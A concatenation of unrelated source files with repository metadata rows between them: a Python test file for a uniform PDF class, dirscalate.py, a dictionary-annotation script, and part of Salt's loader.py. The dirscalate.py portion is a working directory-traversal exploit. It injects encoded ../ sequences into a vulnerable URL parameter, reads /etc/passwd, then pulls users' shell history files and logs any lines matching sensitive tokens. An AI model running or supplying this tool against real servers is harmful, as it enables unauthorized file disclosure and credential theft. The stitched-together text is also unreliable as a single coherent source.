mids = bins[:-1] + np.diff(bins) / 2.0
return mids, n
def compare_curves(x1, y1, x2, y2, **args):
ay = np.interp(x2, x1, y1)
rmse = np.sqrt(np.sum((ay - y2)**2))
print("maximum difference is", np.max(np.abs(ay - y2)))
print("RMSE=%s" % rmse)
# assert rmse < .002
assert np.allclose(ay, y2, **args)
def _test_updf(min, max):
options['pdf']['samples'] = 1000
c = UniformPDF(min=min, max=max)
assert isinstance(c, PDF)
x = c.x
y = stats.uniform(min, max-min).pdf(x)
rmse = np.sqrt(np.sum((c.y - y)**2))
print("RMSE=%s" % rmse)
print("MaxError=", np.max(abs(c.y - y)))
assert rmse < 1e-11
def _test_ucdf(min, max):
options['pdf']['samples'] = 1000
c = UniformPDF(min=min, max=max)
cdfy = stats.uniform(min, max-min).cdf(c.x)
rmse = np.sqrt(np.sum((c.cdfy - cdfy)**2))
print("RMSE=%s" % rmse)
print("MaxError=", np.max(abs(c.cdfy - cdfy)))
assert rmse < 1e-11
"""
import matplotlib.pyplot as plt
plt.plot(c.x, c.cdfy, color='green')
plt.plot(c.x, cdfy, color='red')
plt.show()
"""
# test mean, min, max and deviation
def _test_uniform_minmeanmax(min, mean, max):
c = UniformPDF(min=min, mean=mean, max=max)
cmin, cmax = c.range
print("min=%s mean=%s max=%s" % (cmin, c.mean, cmax))
if min is not None:
assert min == cmin
else:
assert cmin == mean - (max - mean)
if max is not None:
assert max == cmax
else:
assert cmax == mean + (mean - min)
if mean is not None:
assert np.allclose(mean, c.mean)
else:
assert np.allclose(c.mean, (min + max) / 2.0)
# test lhs()
def _test_uniform_lhs(min, max):
c = UniformPDF(min=min, max=max)
# test the lhs() function to see if the curve it generates is
# close enough
data = c.ds(10000)
assert len(data) == 10000
assert np.min(data) >= min
assert np.max(data) <= max
dx, dy = _hisplot(data, 20)
x = dx
y = stats.uniform(min, max-min).pdf(x)
compare_curves(x, y, dx, dy, atol=.0001)
"""
import matplotlib.pyplot as plt
plt.plot(x, y, color='red')
plt.plot(dx, dy, color='blue')
plt.show()
"""
assert np.allclose(c.mean, np.mean(data), rtol=.001), 'mean=%s' % np.mean(data)
# test lhs1()
def _test_uniform_lhs1(min, max):
c = UniformPDF(min=min, max=max)
data = c.ds1(1000)
xs = data
assert len(xs) == 1000
assert min, max == c.range
# scale [-1,1] back to original size
mean = (min + max)/2.0
xs *= max - mean
xs += mean
dx, dy = _hisplot(xs, 20)
x = dx
y = stats.uniform(min, max-min).pdf(x)
compare_curves(x, y, dx, dy, atol=.001)
"""
import matplotlib.pyplot as plt
plt.plot(x, y, color='green')
plt.plot(dx, dy, color='blue')
plt.show()
"""
assert np.allclose(c.mean, np.mean(data), rtol=.001), 'mean=%s' % np.mean(data)
def _test_uniform_random(min, max):
c = UniformPDF(min=min, max=max)
data = c.random(1000000)
assert len(data) == 1000000
dx, dy = _hisplot(data, 20)
x = dx
y = stats.uniform(min, max-min).pdf(x)
compare_curves(x, y, dx, dy, atol=.02)
assert np.min(data) >= min
assert np.max(data) <= max
"""
import matplotlib.pyplot as plt
plt.plot(dx, dy, color='red')
plt.plot(x, y, color='blue')
plt.show()
"""
assert np.allclose(c.mean, np.mean(data), rtol=.001), 'mean=%s' % np.mean(data)
def test_updf():
_test_updf(10,20)
_test_updf(-20,-10)
def test_ucdf():
_test_ucdf(100,105)
_test_ucdf(-1,2)
def test_uniform_minmeanmax():
_test_uniform_minmeanmax(0,None,20)
_test_uniform_minmeanmax(None,0.5,2)
_test_uniform_minmeanmax(5,10,15)
_test_uniform_minmeanmax(5,10,None)
def test_uniform_lhs():
_test_uniform_lhs(10,20)
_test_uniform_lhs(-100, -50)
def test_uniform_lhs1():
_test_uniform_lhs1(10,20)
_test_uniform_lhs1(-100, -50)
def test_uniform_random():
_test_uniform_random(10,20)
if __name__ == "__main__":
test_updf()
test_ucdf()
test_uniform_minmeanmax()
test_uniform_lhs()
test_uniform_lhs1()
test_uniform_random()
|
mit
| 1,280,009,626,194,173,200 | 22.118557 | 83 | 0.584392 | false |
codewatchorg/dirscalate
|
dirscalate.py
|
1
|
7428
|
# Josh Berry
# CodeWatch
# December 2013
#
import re
import argparse
import StringIO
import datetime
import requests
from requests.auth import HTTPBasicAuth
from requests.auth import HTTPDigestAuth
from requests_ntlm import HttpNtlmAuth
parser = argparse.ArgumentParser(prog='dirscalate.py',
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Exploit a directory traversal vulnerability to find sensitive information',
epilog='Example: dirscalate.py --link https://www.victim.com/login.php?test=1&blah=#vulnerability#&id=2 --histfile histfile.txt --tokens tokens.txt --depth 10 --type standard')
parser.add_argument('--link',
required=True,
help='the full URL to exploit, replace value in vulnerable parameter with #vulnerability# marker (must include http(s)://')
parser.add_argument('--histfile',
default='histfile.txt',
help='the list of history files to search')
parser.add_argument('--tokens',
default='tokens.txt',
help='the list of strings to search for in the history files')
parser.add_argument('--logfile',
default='dirscalate.txt',
help='the logfile to write matches to')
parser.add_argument('--depth',
default=10,
type=int,
help='the length of the traversal attempt')
parser.add_argument('--type',
default=1,
type=int,
help='1 (../), 2 (URL encoded), or 3 (double encoded)')
parser.add_argument('--ntlmuser',
default=None,
help='use NTLM authentication with this username (format of domain \\ username)')
parser.add_argument('--ntlmpass',
default=None,
help='use NTLM authentication with this password')
parser.add_argument('--basicuser',
default=None,
help='use BASIC authentication with this username')
parser.add_argument('--basicpass',
default=None,
help='use BASIC authentication with this password')
parser.add_argument('--digestuser',
default=None,
help='use DIGEST authentication with this username')
parser.add_argument('--digestpass',
default=None,
help='use DIGEST authentication with this password')
parser.add_argument('--cookie',
default=None,
help='use a previously established sessions cookie')
parser.set_defaults(histfile='histfile.txt', tokens='tokens.txt', logfile='dirscalate.txt', depth=10, type=1)
# Stick arguments in a variable
args = vars(parser.parse_args())
separator = ''
req = ''
session = requests.Session()
cookies = {}
# BUild the depth of the traversal for the link
def buildTraversal(depth, type):
traversal = ''
for x in range(0, depth):
traversal += type
return traversal
# Add the traversal to the link
def createLink(link, traversal):
traverseLink = re.sub('#vulnerability#', traversal, link)
return traverseLink
# Write matches to a log file
def writeLog(alert):
logfile = open(args['logfile'], 'a')
logTime = str(datetime.datetime.now())
logfile.write(logTime+': '+alert+'\n')
logfile.close()
# Select the traversal type
traverseType = ''
if args['type'] == 3:
traverseType = '%252e%252e%252f'
separator = '%252f'
elif args['type'] == 2:
traverseType = '%2e%2e%2f'
separator = '%2e%2e%2f'
else:
traverseType = '../'
separator = '/'
passwd = 'etc'+separator+'passwd'
# Build the malicious link
traversal = buildTraversal(args['depth'], traverseType)+passwd
newLink = createLink(args['link'], traversal)
# Load the history file
history = open(args['histfile'])
print '[*] Attempting exploit on: '+newLink
# Check to see if BASIC/DIGEST/NTLM/Cookie authentication is being performed
# If so, pass credentials to session, if not, just connect to JNLP URL
if args['ntlmuser'] is not None and args['ntlmpass'] is not None:
session.auth = HttpNtlmAuth(args['ntlmuser'],args['ntlmpass'], session)
req = session.get(newLink, verify=False)
elif args['basicuser'] is not None and args['basicpass'] is not None:
session.auth = HTTPBasicAuth(args['basicuser'],args['basicpass'])
req = session.get(newLink, verify=False)
elif args['digestuser'] is not None and args['digestpass'] is not None:
session.auth = HTTPDigestAuth(args['digestuser'],args['digestpass'])
req = session.get(newLink, verify=False)
elif args['cookie'] is not None:
# Check to see if the cookie has a semicolon, if so there might be mutiple cookies
if re.search(';', args['cookie']):
cookielist = args['cookie'].split(';')
# Loop through list of cookies
for dircookies in cookielist:
# If there isn't an equal and some sort of content, then it isn't a valid cookie, otherwise add to list of cookies
if re.search('[a-zA-Z0-9]', dircookies) and re.search('[=]', dircookies):
cookieparts = dircookies.split('=')
cookies[cookieparts[0]] = cookieparts[1]
else:
# Check to see if cookie has =, if not it is malformed and send dummy cookie
# If so, split at the = into correct name/value pairs
if re.search('=', args['cookie']):
cookielist = args['cookie'].split('=')
cookies[cookielist[0]] = cookielist[1]
else:
cookies['dirscalate'] = 'dirscalate'
req = session.get(newLink, cookies=cookies, verify=False)
else:
req = session.get(newLink, verify=False)
# If the status code is not 200, the file was likely inaccessible so we exit
if req.status_code is not 200:
print '[*] Link was inaccessible, exiting.'
exit(0)
page = req.text
lines = page.split('\n')
homedirs = []
print '[*] Building list of home directories'
for line in lines:
if re.search('^[a-zA-Z0-9]', line):
if line not in homedirs:
home = line.split(':')
if len(home) >= 6:
if home[5] is not None:
if re.search('^/[a-zA-Z0-9]', home[5]):
homedirs.append(home[5])
print '[+] Adding home directory: '+home[5]
else:
homedirs.append('/')
print '[+] Adding home directory: /'
else:
homedirs.append('/')
print '[+] Adding home directory: /'
else:
homedirs.append('/')
print '[+] Adding home directory: /'
print '[*] Checking each history file'
# Loop through each history file
for hist in history.readlines():
# Loop through each enumerated home directory
for home in homedirs:
# Build the traversal link
getfile = re.sub('^\/', '', home)
getfile = re.sub('/', separator, getfile)
traversal = buildTraversal(args['depth'], traverseType)+getfile+separator+hist.strip()
newLink = createLink(args['link'], traversal)
print '[+] Searching: '+home+separator+hist.strip()
try:
# Access the traversal link
req = ''
if args['cookie'] is not None:
req = session.get(newLink, cookies=cookies, verify=False)
else:
req = session.get(newLink, verify=False)
page = req.text
lines = page.split('\n')
treasure = []
# Load the tokens file
tokens = open(args['tokens'])
# Loop through each token
for token in tokens.readlines():
stoken = token.strip()
# Loop through each line of the history file
for line in lines:
sline = line.strip()
# If we found a match, write to a logfile
if re.search(stoken, sline, re.IGNORECASE):
if sline not in treasure:
print '[-] Found a matching token in '+home+separator+hist.strip()
writeLog(home+separator+hist.strip()+': '+sline)
treasure.append(sline)
except:
print '[-] Failed accessing history file at '+home+separator+hist.strip()
|
bsd-2-clause
| -6,577,279,926,893,694,000 | 32.165179 | 177 | 0.675283 | false |
FrankNagel/qlc
|
src/webapp/quanthistling/scripts/annotations/annotations_for_payne1989.py
|
1
|
4018
|
# -*- coding: utf8 -*-
import sys, os
sys.path.append(os.path.abspath('.'))
import re
from operator import attrgetter
import difflib
# Pylons model init sequence
import pylons.test
import logging
from quanthistling.config.environment import load_environment
from quanthistling.model.meta import Session, metadata
from quanthistling import model
import quanthistling.dictdata.books
from paste.deploy import appconfig
import functions
def annotate_head(entry):
# delete head annotations
head_annotations = [ a for a in entry.annotations if a.value in ['head', "iso-639-3", "doculect", 'boundary']]
for a in head_annotations:
Session.delete(a)
# Delete this code and insert your code
head = None
heads = []
head_start = 0
head_end = functions.get_last_bold_pos_at_start(entry)
for i in xrange(0, head_end):
if entry.fullentry[i] == '-':
entry.append_annotation(i, i+1, u'boundary', u'dictinterpretation', u"morpheme boundary")
while head_start < head_end and entry.fullentry[head_start] in ' -':
head_start += 1
while head_end > head_start and entry.fullentry[head_end-1] in ' -':
head_end -= 1
head = functions.insert_head(entry, head_start, head_end)
if head:
heads.append(head)
return heads
def annotate_translations(entry):
# delete translation annotations
trans_annotations = [ a for a in entry.annotations if a.value=='translation']
for a in trans_annotations:
Session.delete(a)
translation_start = functions.get_last_bold_pos_at_start(entry) + 1
translation_end = functions.get_first_bold_start_in_range(entry, translation_start, len(entry.fullentry))
if translation_end == -1:
translation_end = len(entry.fullentry)
match_bracket = re.search("^ ?\([^\)]*\) ?", entry.fullentry[translation_start:translation_end])
if match_bracket:
translation_start += len(match_bracket.group(0))
match_capitals = re.search("^ ?(?:PI|PE) ?", entry.fullentry[translation_start:translation_end])
if match_capitals:
translation_start += len(match_capitals.group(0))
start = translation_start
for t_start, t_end in functions.split_entry_at(entry, r'[,;] |/|$', translation_start, translation_end):
t_start, t_end, translation = functions.remove_parts(entry, t_start, t_end)
match = re.match(r'\(vr-[it]\.( irr\.)?\)|\(vt\.\)', translation)
if match:
translation = translation[len(match.group()):]
functions.insert_translation(entry, t_start, t_end, translation)
def main(argv):
bibtex_key = u"payne1989"
if len(argv) < 2:
print "call: annotations_for%s.py ini_file" % bibtex_key
exit(1)
ini_file = argv[1]
conf = appconfig('config:' + ini_file, relative_to='.')
if not pylons.test.pylonsapp:
load_environment(conf.global_conf, conf.local_conf)
# Create the tables if they don't already exist
metadata.create_all(bind=Session.bind)
dictdatas = Session.query(model.Dictdata).join(
(model.Book, model.Dictdata.book_id==model.Book.id)
).filter(model.Book.bibtex_key==bibtex_key).all()
for dictdata in dictdatas:
entries = Session.query(model.Entry).filter_by(dictdata_id=dictdata.id).all()
#entries = Session.query(model.Entry).filter_by(dictdata_id=dictdata.id,startpage=381,pos_on_page=28).all()
startletters = set()
for e in entries:
heads = annotate_head(e)
if not e.is_subentry:
for h in heads:
if len(h) > 0:
startletters.add(h[0].lower())
annotate_translations(e)
dictdata.startletters = unicode(repr(sorted(list(startletters))))
Session.commit()
if __name__ == "__main__":
main(sys.argv)
|
gpl-3.0
| 6,149,296,717,054,123,000 | 31.764706 | 115 | 0.623444 | false |
smallyear/linuxLearn
|
salt/salt/loader.py
|
1
|
51863
|
# -*- coding: utf-8 -*-
'''
We wanna be free to ride our machines without being hassled by The Man!
And we wanna get loaded!
And we wanna have a good time!
And that's what we are gonna do. We are gonna have a good time...
'''
# Import python libs
from __future__ import absolute_import
import os
import imp
import sys
import salt
import time
import logging
import inspect
import tempfile
import functools
from collections import MutableMapping
from zipimport import zipimporter
# Import salt libs
from salt.exceptions import LoaderError
from salt.template import check_render_pipe_str
from salt.utils.decorators import Depends
from salt.utils import context
import salt.utils.lazy
import salt.utils.odict
import salt.utils.event
import salt.utils.odict
# Solve the Chicken and egg problem where grains need to run before any
# of the modules are loaded and are generally available for any usage.
import salt.modules.cmdmod
# Import 3rd-party libs
import salt.ext.six as six
__salt__ = {
'cmd.run': salt.modules.cmdmod._run_quiet
}
log = logging.getLogger(__name__)
SALT_BASE_PATH = os.path.abspath(os.path.dirname(salt.__file__))
LOADED_BASE_NAME = 'salt.loaded'
# Because on the cloud drivers we do `from salt.cloud.libcloudfuncs import *`
# which simplifies code readability, it adds some unsupported functions into
# the driver's module scope.
# We list un-supported functions here. These will be removed from the loaded.
LIBCLOUD_FUNCS_NOT_SUPPORTED = (
'parallels.avail_sizes',
'parallels.avail_locations',
'proxmox.avail_sizes',
'saltify.destroy',
'saltify.avail_sizes',
'saltify.avail_images',
'saltify.avail_locations',
'rackspace.reboot',
'openstack.list_locations',
'rackspace.list_locations'
)
# Will be set to pyximport module at runtime if cython is enabled in config.
pyximport = None
def static_loader(
opts,
ext_type,
tag,
pack=None,
int_type=None,
ext_dirs=True,
ext_type_dirs=None,
base_path=None,
filter_name=None,
):
funcs = LazyLoader(_module_dirs(opts,
ext_type,
tag,
int_type,
ext_dirs,
ext_type_dirs,
base_path),
opts,
tag=tag,
pack=pack,
)
ret = {}
funcs._load_all()
if filter_name:
funcs = FilterDictWrapper(funcs, filter_name)
for key in funcs:
ret[key] = funcs[key]
return ret
def _module_dirs(
opts,
ext_type,
tag,
int_type=None,
ext_dirs=True,
ext_type_dirs=None,
base_path=None,
):
sys_types = os.path.join(base_path or SALT_BASE_PATH, int_type or ext_type)
ext_types = os.path.join(opts['extension_modules'], ext_type)
ext_type_types = []
if ext_dirs:
if ext_type_dirs is None:
ext_type_dirs = '{0}_dirs'.format(tag)
if ext_type_dirs in opts:
ext_type_types.extend(opts[ext_type_dirs])
cli_module_dirs = []
# The dirs can be any module dir, or a in-tree _{ext_type} dir
for _dir in opts.get('module_dirs', []):
# Prepend to the list to match cli argument ordering
maybe_dir = os.path.join(_dir, ext_type)
if os.path.isdir(maybe_dir):
cli_module_dirs.insert(0, maybe_dir)
continue
maybe_dir = os.path.join(_dir, '_{0}'.format(ext_type))
if os.path.isdir(maybe_dir):
cli_module_dirs.insert(0, maybe_dir)
return cli_module_dirs + ext_type_types + [ext_types, sys_types]
def minion_mods(
opts,
context=None,
utils=None,
whitelist=None,
include_errors=False,
initial_load=False,
loaded_base_name=None,
notify=False,
proxy=None):
'''
Load execution modules
Returns a dictionary of execution modules appropriate for the current
system by evaluating the __virtual__() function in each module.
:param dict opts: The Salt options dictionary
:param dict context: A Salt context that should be made present inside
generated modules in __context__
:param dict utils: Utility functions which should be made available to
Salt modules in __utils__. See `utils_dir` in
salt.config for additional information about
configuration.
:param list whitelist: A list of modules which should be whitelisted.
:param bool include_errors: Deprecated flag! Unused.
:param bool initial_load: Deprecated flag! Unused.
:param str loaded_base_name: A string marker for the loaded base name.
:param bool notify: Flag indicating that an event should be fired upon
completion of module loading.
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
__grains__ = salt.loader.grains(__opts__)
__opts__['grains'] = __grains__
__salt__ = salt.loader.minion_mods(__opts__)
__salt__['test.ping']()
'''
# TODO Publish documentation for module whitelisting
if context is None:
context = {}
if utils is None:
utils = {}
if proxy is None:
proxy = {}
if not whitelist:
whitelist = opts.get('whitelist_modules', None)
ret = LazyLoader(_module_dirs(opts, 'modules', 'module'),
opts,
tag='module',
pack={'__context__': context, '__utils__': utils,
'__proxy__': proxy},
whitelist=whitelist,
loaded_base_name=loaded_base_name)
ret.pack['__salt__'] = ret
# Load any provider overrides from the configuration file providers option
# Note: Providers can be pkg, service, user or group - not to be confused
# with cloud providers.
providers = opts.get('providers', False)
if providers and isinstance(providers, dict):
for mod in providers:
# sometimes providers opts is not to diverge modules but
# for other configuration
try:
funcs = raw_mod(opts, providers[mod], ret)
except TypeError:
break
else:
if funcs:
for func in funcs:
f_key = '{0}{1}'.format(mod, func[func.rindex('.'):])
ret[f_key] = funcs[func]
if notify:
evt = salt.utils.event.get_event('minion', opts=opts, listen=False)
evt.fire_event({'complete': True}, tag='/salt/minion/minion_mod_complete')
return ret
def raw_mod(opts, name, functions, mod='modules'):
'''
Returns a single module loaded raw and bypassing the __virtual__ function
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
testmod = salt.loader.raw_mod(__opts__, 'test', None)
testmod['test.ping']()
'''
loader = LazyLoader(_module_dirs(opts, mod, 'rawmodule'),
opts,
tag='rawmodule',
virtual_enable=False,
pack={'__salt__': functions})
# if we don't have the module, return an empty dict
if name not in loader.file_mapping:
return {}
loader._load_module(name) # load a single module (the one passed in)
return dict(loader._dict) # return a copy of *just* the funcs for `name`
def engines(opts, functions, runners):
'''
Return the master services plugins
'''
pack = {'__salt__': functions,
'__runners__': runners}
return LazyLoader(_module_dirs(opts, 'engines', 'engines'),
opts,
tag='engines',
pack=pack)
def proxy(opts, functions=None, returners=None, whitelist=None):
'''
Returns the proxy module for this salt-proxy-minion
'''
ret = LazyLoader(_module_dirs(opts, 'proxy', 'proxy'),
opts,
tag='proxy',
pack={'__salt__': functions,
'__ret__': returners})
ret.pack['__proxy__'] = ret
return ret
def returners(opts, functions, whitelist=None, context=None):
'''
Returns the returner modules
'''
if context is None:
context = {}
return LazyLoader(_module_dirs(opts, 'returners', 'returner'),
opts,
tag='returner',
whitelist=whitelist,
pack={'__salt__': functions,
'__context__': context})
def utils(opts, whitelist=None, context=None):
'''
Returns the utility modules
'''
if context is None:
context = {}
return LazyLoader(_module_dirs(opts, 'utils', 'utils', ext_type_dirs='utils_dirs'),
opts,
tag='utils',
whitelist=whitelist,
pack={'__context__': context})
def pillars(opts, functions, context=None):
'''
Returns the pillars modules
'''
if context is None:
context = {}
ret = LazyLoader(_module_dirs(opts, 'pillar', 'pillar'),
opts,
tag='pillar',
pack={'__salt__': functions,
'__context__': context})
return FilterDictWrapper(ret, '.ext_pillar')
def tops(opts):
'''
Returns the tops modules
'''
if 'master_tops' not in opts:
return {}
whitelist = list(opts['master_tops'].keys())
ret = LazyLoader(_module_dirs(opts, 'tops', 'top'),
opts,
tag='top',
whitelist=whitelist)
return FilterDictWrapper(ret, '.top')
def wheels(opts, whitelist=None):
'''
Returns the wheels modules
'''
return LazyLoader(_module_dirs(opts, 'wheel', 'wheel'),
opts,
tag='wheel',
whitelist=whitelist)
def outputters(opts):
'''
Returns the outputters modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader instance, with only outputters present in the keyspace
'''
ret = LazyLoader(_module_dirs(opts, 'output', 'output', ext_type_dirs='outputter_dirs'),
opts,
tag='output')
wrapped_ret = FilterDictWrapper(ret, '.output')
# TODO: this name seems terrible... __salt__ should always be execution mods
ret.pack['__salt__'] = wrapped_ret
return wrapped_ret
def serializers(opts):
'''
Returns the serializers modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader instance, with only serializers present in the keyspace
'''
return LazyLoader(_module_dirs(opts, 'serializers', 'serializers'),
opts,
tag='serializers')
def auth(opts, whitelist=None):
'''
Returns the auth modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader
'''
return LazyLoader(_module_dirs(opts, 'auth', 'auth'),
opts,
tag='auth',
whitelist=whitelist,
pack={'__salt__': minion_mods(opts)})
def fileserver(opts, backends):
'''
Returns the file server modules
'''
return LazyLoader(_module_dirs(opts, 'fileserver', 'fileserver'),
opts,
tag='fileserver',
whitelist=backends)
def roster(opts, whitelist=None):
'''
Returns the roster modules
'''
return LazyLoader(_module_dirs(opts, 'roster', 'roster'),
opts,
tag='roster',
whitelist=whitelist)
def states(opts, functions, utils, whitelist=None):
'''
Returns the state modules
:param dict opts: The Salt options dictionary
:param dict functions: A dictionary of minion modules, with module names as
keys and funcs as values.
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
statemods = salt.loader.states(__opts__, None, None)
'''
ret = LazyLoader(_module_dirs(opts, 'states', 'states'),
opts,
tag='states',
pack={'__salt__': functions},
whitelist=whitelist)
ret.pack['__states__'] = ret
ret.pack['__utils__'] = utils
return ret
def beacons(opts, functions, context=None):
'''
Load the beacon modules
:param dict opts: The Salt options dictionary
:param dict functions: A dictionary of minion modules, with module names as
keys and funcs as values.
'''
if context is None:
context = {}
return LazyLoader(_module_dirs(opts, 'beacons', 'beacons'),
opts,
tag='beacons',
pack={'__context__': context,
'__salt__': functions})
def search(opts, returners, whitelist=None):
'''
Returns the search modules
:param dict opts: The Salt options dictionary
:param returners: Undocumented
:param whitelist: Undocumented
'''
# TODO Document returners arg
# TODO Document whitelist arg
return LazyLoader(_module_dirs(opts, 'search', 'search'),
opts,
tag='search',
whitelist=whitelist,
pack={'__ret__': returners})
def log_handlers(opts):
'''
Returns the custom logging handler modules
:param dict opts: The Salt options dictionary
'''
ret = LazyLoader(_module_dirs(opts,
'log_handlers',
'log_handlers',
int_type='handlers',
base_path=os.path.join(SALT_BASE_PATH, 'log')),
opts,
tag='log_handlers',
)
return FilterDictWrapper(ret, '.setup_handlers')
def ssh_wrapper(opts, functions=None, context=None):
'''
Returns the custom logging handler modules
'''
if context is None:
context = {}
if functions is None:
functions = {}
return LazyLoader(_module_dirs(opts,
'wrapper',
'wrapper',
base_path=os.path.join(SALT_BASE_PATH, os.path.join('client', 'ssh'))),
opts,
tag='wrapper',
pack={'__salt__': functions, '__context__': context},
)
def render(opts, functions, states=None):
'''
Returns the render modules
'''
pack = {'__salt__': functions}
if states:
pack['__states__'] = states
ret = LazyLoader(_module_dirs(opts,
'renderers',
'render',
ext_type_dirs='render_dirs'),
opts,
tag='render',
pack=pack,
)
rend = FilterDictWrapper(ret, '.render')
if not check_render_pipe_str(opts['renderer'], rend):
err = ('The renderer {0} is unavailable, this error is often because '
'the needed software is unavailable'.format(opts['renderer']))
log.critical(err)
raise LoaderError(err)
return rend
def grain_funcs(opts):
'''
Returns the grain functions
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
grainfuncs = salt.loader.grain_funcs(__opts__)
'''
return LazyLoader(_module_dirs(opts,
'grains',
'grain',
ext_type_dirs='grains_dirs'),
opts,
tag='grains',
)
def grains(opts, force_refresh=False, proxy=None):
'''
Return the functions for the dynamic grains and the values for the static
grains.
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
__grains__ = salt.loader.grains(__opts__)
print __grains__['id']
'''
# if we hae no grains, lets try loading from disk (TODO: move to decorator?)
if not force_refresh:
if opts.get('grains_cache', False):
cfn = os.path.join(
opts['cachedir'],
'grains.cache.p'
)
if os.path.isfile(cfn):
grains_cache_age = int(time.time() - os.path.getmtime(cfn))
if opts.get('grains_cache_expiration', 300) >= grains_cache_age and not \
opts.get('refresh_grains_cache', False) and not force_refresh:
log.debug('Retrieving grains from cache')
try:
serial = salt.payload.Serial(opts)
with salt.utils.fopen(cfn, 'rb') as fp_:
cached_grains = serial.load(fp_)
return cached_grains
except (IOError, OSError):
pass
else:
if force_refresh:
log.debug('Grains refresh requested. Refreshing grains.')
else:
log.debug('Grains cache last modified {0} seconds ago and '
'cache expiration is set to {1}. '
'Grains cache expired. Refreshing.'.format(
grains_cache_age,
opts.get('grains_cache_expiration', 300)
))
else:
log.debug('Grains cache file does not exist.')
if opts.get('skip_grains', False):
return {}
if 'conf_file' in opts:
pre_opts = {}
pre_opts.update(salt.config.load_config(
opts['conf_file'], 'SALT_MINION_CONFIG',
salt.config.DEFAULT_MINION_OPTS['conf_file']
))
default_include = pre_opts.get(
'default_include', opts['default_include']
)
include = pre_opts.get('include', [])
pre_opts.update(salt.config.include_config(
default_include, opts['conf_file'], verbose=False
))
pre_opts.update(salt.config.include_config(
include, opts['conf_file'], verbose=True
))
if 'grains' in pre_opts:
opts['grains'] = pre_opts['grains']
else:
opts['grains'] = {}
else:
opts['grains'] = {}
grains_data = {}
funcs = grain_funcs(opts)
if force_refresh: # if we refresh, lets reload grain modules
funcs.clear()
# Run core grains
for key, fun in six.iteritems(funcs):
if not key.startswith('core.'):
continue
log.trace('Loading {0} grain'.format(key))
ret = fun()
if not isinstance(ret, dict):
continue
grains_data.update(ret)
# Run the rest of the grains
for key, fun in six.iteritems(funcs):
if key.startswith('core.') or key == '_errors':
continue
try:
ret = fun()
except Exception:
log.critical(
'Failed to load grains defined in grain file {0} in '
'function {1}, error:\n'.format(
key, fun
),
exc_info=True
)
continue
if not isinstance(ret, dict):
continue
grains_data.update(ret)
grains_data.update(opts['grains'])
# Write cache if enabled
if opts.get('grains_cache', False):
cumask = os.umask(0o77)
try:
if salt.utils.is_windows():
# Make sure cache file isn't read-only
__salt__['cmd.run']('attrib -R "{0}"'.format(cfn))
with salt.utils.fopen(cfn, 'w+b') as fp_:
try:
serial = salt.payload.Serial(opts)
serial.dump(grains_data, fp_)
except TypeError:
# Can't serialize pydsl
pass
except (IOError, OSError):
msg = 'Unable to write to grains cache file {0}'
log.error(msg.format(cfn))
os.umask(cumask)
return grains_data
# TODO: get rid of? Does anyone use this? You should use raw() instead
def call(fun, **kwargs):
'''
Directly call a function inside a loader directory
'''
args = kwargs.get('args', [])
dirs = kwargs.get('dirs', [])
funcs = LazyLoader([os.path.join(SALT_BASE_PATH, 'modules')] + dirs,
None,
tag='modules',
virtual_enable=False,
)
return funcs[fun](*args)
def runner(opts):
'''
Directly call a function inside a loader directory
'''
ret = LazyLoader(_module_dirs(opts, 'runners', 'runner', ext_type_dirs='runner_dirs'),
opts,
tag='runners',
)
# TODO: change from __salt__ to something else, we overload __salt__ too much
ret.pack['__salt__'] = ret
return ret
def queues(opts):
'''
Directly call a function inside a loader directory
'''
return LazyLoader(_module_dirs(opts, 'queues', 'queue', ext_type_dirs='queue_dirs'),
opts,
tag='queues',
)
def sdb(opts, functions=None, whitelist=None):
'''
Make a very small database call
'''
return LazyLoader(_module_dirs(opts, 'sdb', 'sdb'),
opts,
tag='sdb',
pack={'__sdb__': functions},
whitelist=whitelist,
)
def pkgdb(opts):
'''
Return modules for SPM's package database
.. versionadded:: 2015.8.0
'''
return LazyLoader(
_module_dirs(
opts,
'pkgdb',
'pkgdb',
base_path=os.path.join(SALT_BASE_PATH, 'spm')
),
opts,
tag='pkgdb'
)
def pkgfiles(opts):
'''
Return modules for SPM's file handling
.. versionadded:: 2015.8.0
'''
return LazyLoader(
_module_dirs(
opts,
'pkgfiles',
'pkgfiles',
base_path=os.path.join(SALT_BASE_PATH, 'spm')
),
opts,
tag='pkgfiles'
)
def clouds(opts):
'''
Return the cloud functions
'''
# Let's bring __active_provider_name__, defaulting to None, to all cloud
# drivers. This will get temporarily updated/overridden with a context
# manager when needed.
functions = LazyLoader(_module_dirs(opts,
'clouds',
'cloud',
base_path=os.path.join(SALT_BASE_PATH, 'cloud'),
int_type='clouds'),
opts,
tag='clouds',
pack={'__active_provider_name__': None},
)
for funcname in LIBCLOUD_FUNCS_NOT_SUPPORTED:
log.trace(
'{0!r} has been marked as not supported. Removing from the list '
'of supported cloud functions'.format(
funcname
)
)
functions.pop(funcname, None)
return functions
def netapi(opts):
'''
Return the network api functions
'''
return LazyLoader(_module_dirs(opts, 'netapi', 'netapi'),
opts,
tag='netapi',
)
def _generate_module(name):
if name in sys.modules:
return
code = "'''Salt loaded {0} parent module'''".format(name.split('.')[-1])
module = imp.new_module(name)
exec(code, module.__dict__)
sys.modules[name] = module
def _mod_type(module_path):
if module_path.startswith(SALT_BASE_PATH):
return 'int'
return 'ext'
# TODO: move somewhere else?
class FilterDictWrapper(MutableMapping):
'''
Create a dict which wraps another dict with a specific key suffix on get
This is to replace "filter_load"
'''
def __init__(self, d, suffix):
self._dict = d
self.suffix = suffix
def __setitem__(self, key, val):
self._dict[key] = val
def __delitem__(self, key):
del self._dict[key]
def __getitem__(self, key):
return self._dict[key + self.suffix]
def __len__(self):
return len(self._dict)
def __iter__(self):
for key in self._dict:
if key.endswith(self.suffix):
yield key.replace(self.suffix, '')
class LazyLoader(salt.utils.lazy.LazyDict):
'''
Goals here:
- lazy loading
- minimize disk usage
# TODO:
- move modules_max_memory into here
- singletons (per tag)
'''
def __init__(self,
module_dirs,
opts=None,
tag='module',
loaded_base_name=None,
mod_type_check=None,
pack=None,
whitelist=None,
virtual_enable=True,
